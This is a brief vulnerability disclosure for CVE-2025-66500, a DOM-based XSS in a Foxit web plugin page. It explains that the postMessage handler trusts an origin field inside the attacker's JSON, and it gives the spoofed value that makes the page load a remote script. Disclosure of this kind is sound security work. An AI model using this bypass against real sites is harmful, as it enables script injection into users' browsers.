CVE-2025-66500 - DOM XSS via Unsafe postMessage Handler

Foxit Web Plugins (webplugins.foxit.com/calculator/commands.html)

Identified on the live production domain.

A postMessage handler fails to validate the actual sender’s origin, allowing an attacker to inject a remote script tag into the Foxit domain.

The handler incorrectly validates event.data.origin (a string inside the attacker-controlled JSON payload) instead of the browser-enforced event.origin. By passing {"origin": "FoxitApp"}, an attacker can reach a code path that accepts an externalPath URL and appends it to the DOM as a new <script> tag.